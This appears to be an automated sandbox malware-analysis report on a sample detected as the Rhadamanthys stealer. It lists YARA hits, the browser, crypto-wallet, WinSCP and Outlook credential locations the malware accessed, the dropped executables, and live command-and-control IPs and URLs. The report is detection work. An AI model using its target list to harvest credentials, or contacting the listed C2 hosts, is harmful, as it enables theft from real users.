Source: Yara match File source: 22.2.Yuem.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.Yuem.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.OpenWith.exe.1bd779c0438.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.OpenWith.exe.1bd779c0438.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.OpenWith.exe.1bd779627f8.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.2745389510.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2520663901.000001BD779C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2518352508.000001BD77953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.2522186450.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2755905464.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2518526497.000001BD7793B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2522953680.000001BD77953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.2552580820.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.2538475835.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe, type: DROPPED
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 00000010.00000003.2230681896.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2201808869.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: !CP:Defichain-Electrum
Source: OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\ElectronCash\config
Source: OpenWith.exe, 00000014.00000003.2385145930.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus\exodus.wallet
Source: OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus\exodus.wallet
Source: OpenWith.exe, 00000014.00000003.2387934347.000001BD7776B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 6736, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 00000010.00000003.2230681896.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2201808869.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B14B8 socket,bind, 20_3_00007DF4B63B14B8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 20_3_00007DF4B637F83C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D10098 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 22_2_00D10098
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CE2340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 22_2_00CE2340
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D0F3A1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 22_2_00D0F3A1
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A80098 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 23_2_00A80098
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A52340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 23_2_00A52340
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A7F3A1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 23_2_00A7F3A1
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A80098 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 24_2_00A80098
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A7F3A1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 24_2_00A7F3A1
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1425696 Sample: J2NWKU2oJi.exe Startdate: 14/04/2024 Architecture: WINDOWS Score: 100 58 hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq 2->58 66 Snort IDS alert for network traffic 2->66 68 Found malware configuration 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 8 other signatures 2->72 12 J2NWKU2oJi.exe 25 2->12         started        14 Dctooux.exe 2->14         started        16 Dctooux.exe 2->16         started        signatures3 process4 process5 18 cmd.exe 2 12->18         started        file6 50 C:\Users\user\AppData\Local\...\Pleasure.pif, PE32 18->50 dropped 74 Uses ping.exe to sleep 18->74 76 Drops PE files with a suspicious file extension 18->76 78 Uses ping.exe to check the status of other devices and networks 18->78 22 Pleasure.pif 1 18->22         started        25 PING.EXE 1 18->25         started        28 cmd.exe 2 18->28         started        30 7 other processes 18->30 signatures7 process8 dnsIp9 80 Machine Learning detection for dropped file 22->80 32 dialer.exe 22->32         started        36 WerFault.exe 2 22->36         started        60 127.0.0.1 unknown unknown 25->60 signatures10 process11 dnsIp12 56 94.156.10.37, 2036, 49736, 49738 NETERRA-ASBG Bulgaria 32->56 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 32->64 38 OpenWith.exe 1 32->38         started        signatures13 process14 file15 52 C:\Users\user\AppData\Local\...\Yuem.exe, PE32 38->52 dropped 82 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 38->82 84 Tries to steal Mail credentials (via file / registry access) 38->84 86 Found many strings related to Crypto-Wallets (likely being stolen) 38->86 88 2 other signatures 38->88 42 Yuem.exe 4 38->42         started        signatures16 process17 file18 54 C:\Users\user\AppData\Local\...\Dctooux.exe, PE32 42->54 dropped 90 Antivirus detection for dropped file 42->90 92 Multi AV Scanner detection for dropped file 42->92 94 Machine Learning detection for dropped file 42->94 96 Contains functionality to inject code into remote processes 42->96 46 Dctooux.exe 42->46         started        signatures19 process20 dnsIp21 62 91.202.233.180, 49740, 49741, 49742 M247GB Russian Federation 46->62 98 Antivirus detection for dropped file 46->98 100 Multi AV Scanner detection for dropped file 46->100 102 Machine Learning detection for dropped file 46->102 signatures22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
94.156.10.37
 unknown Bulgaria
34224 NETERRA-ASBG true
91.202.233.180
 unknown Russian Federation
9009 M247GB true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://91.202.233.180/g88sks2SaM/index.php true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://91.202.233.180/g88sks2SaM/index.php?scr=1 true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown